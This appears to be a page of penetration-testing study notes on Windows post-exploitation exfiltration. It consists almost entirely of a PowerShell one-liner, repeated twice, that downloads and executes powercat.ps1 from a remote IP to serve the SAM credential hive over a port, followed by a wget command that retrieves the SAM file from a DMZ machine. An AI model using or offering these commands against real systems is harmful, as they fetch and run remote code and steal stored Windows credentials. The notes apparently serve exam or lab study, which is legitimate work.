// notes/ Pivoting & Tunneling
🚀
Exfiltration Windows Pickle
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.160.147:8888/powercat.ps1');powercat -l -p 6666 -i C:\windows.old\Windows\System32/SAM"
#post exploitation#adot8
source · oscp.adot8.com · post-exploitation/exfiltration_windows-pickle ↗Windows - Pickle
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.160.147:8888/powercat.ps1');powercat -l -p 6666 -i C:\windows.old\Windows\System32/SAM"
Then grab from DMZ machine
code
01wget 10.10.160.148:6666/SAM